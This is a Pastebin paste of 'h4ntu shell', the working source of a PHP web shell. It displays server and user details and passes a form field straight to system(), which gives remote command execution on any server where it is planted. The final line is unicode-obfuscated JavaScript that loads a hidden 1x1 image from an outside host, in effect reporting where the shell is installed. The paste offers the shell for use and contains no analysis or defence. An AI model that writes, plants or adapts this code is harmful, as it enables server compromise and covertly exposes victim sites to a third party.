API tools faq
paste
Advertisement
blackcyberrootshell

[ + ] H4ntu Shell [ + ]

blackcyberrootshell
Mar 3rd, 2015
318
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.91 KB | None | 0 0
raw download clone embed print report
  1. <title>h4ntu shell [powered by tsoi]</title>
  2. <?php
  3. echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font></p>";
  4. ?>
  5.  
  6. <?php
  7.   closelog( );
  8.   $user = get_current_user( );
  9.   $login = posix_getuid( );
  10.   $euid = posix_geteuid( );
  11.   $ver = phpversion( );
  12.   $gid = posix_getgid( );
  13.   if ($chdir == "") $chdir = getcwd( );
  14.   if(!$whoami)$whoami=exec("whoami");
  15. ?>
  16. <meta name="generator" content="Namo WebEditor v5.0">
  17. <br>
  18. <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
  19. <?php
  20.   $uname = posix_uname( );
  21.   while (list($info, $value) = each ($uname)) {
  22. ?>
  23.   <TR>
  24.     <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
  25.   </TR>
  26. <?php
  27.   }
  28. ?>
  29.   <TR>
  30.  
  31.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</DIV></TD>
  32.   </TR>
  33.   <TR>
  34.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Current Path:</b> <?= $chdir ?></DIV></TD>
  35.  
  36.   </TR>
  37.   <TR>
  38.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Permission Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?></DIV></TD>
  39.   </TR>  
  40.   <TR>
  41.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
  42.   </TR>
  43.  
  44.   <TR>
  45.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?></DIV></TD>
  46.   </TR>
  47.   <TR>
  48.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Script Current User:</b> <?= $user ?></DIV></TD>
  49.   </TR>
  50.   <TR>
  51.  
  52.   <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>PHP Version:</b> <?= $ver ?></DIV></TD>
  53.   </TR>
  54. </TABLE>
  55. <BR>
  56.  
  57. <font face="courier new" size="2" color="777777"><b>#</b>php injection: <br>
  58. </font><FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
  59. <font face="courier new" size="2" color="777777">cmd :
  60. <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="161">
  61. <br>
  62. <INPUT TYPE="submit">
  63. </font></FORM>
  64.  
  65. <hr color=777777 width=100% height=115px>
  66.  
  67. <pre>
  68. <?
  69. $cmd = $_POST['cmd'];
  70.   if (isset($chdir)) @chdir($chdir);
  71.   ob_start();
  72.   system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  73.   $output = ob_get_contents();
  74.   ob_end_clean();
  75.   if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
  76. exit;
  77. ?>
  78. </pre>
  79. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!